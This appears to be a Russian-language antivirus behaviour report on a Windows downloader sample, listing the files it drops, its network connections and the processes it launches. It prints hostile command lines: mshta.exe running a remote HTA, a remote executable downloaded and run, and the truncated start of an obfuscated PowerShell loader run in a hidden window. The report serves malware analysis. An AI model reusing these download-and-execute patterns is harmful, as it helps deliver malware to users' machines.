Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://17#.#3.175.187/puao/PO-M6888722.hta
- '%APPDATA%\po-m6888757.exe'
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\po-m6888757.exe
Сетевая активность
Подключается к
- '17#.#3.175.187':80
- 'on####ve.live.com':443
- 'microsoft.com':80
- 'la####.#b.files.1drv.com':443
TCP
Запросы HTTP GET
- http://17#.#3.175.187/puao/PO-M6888722.hta
- http://17#.#3.175.187/puao/PO-M6888757.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
Другие
- 'on####ve.live.com':443
- 'la####.#b.files.1drv.com':443
UDP
- DNS ASK on####ve.live.com
- DNS ASK microsoft.com
- DNS ASK la####.#b.files.1drv.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function geZpHL($fwNbw, $GPCHUj){[IO.File]::WriteAllBytes($fwNbw, $GPCHUj)};function ggKvMcgPZ($fwNbw){if($fwNbw.EndsWith((cBpSv @(15030,15084,15092,15092))) -eq $...' (со скрытым окном)
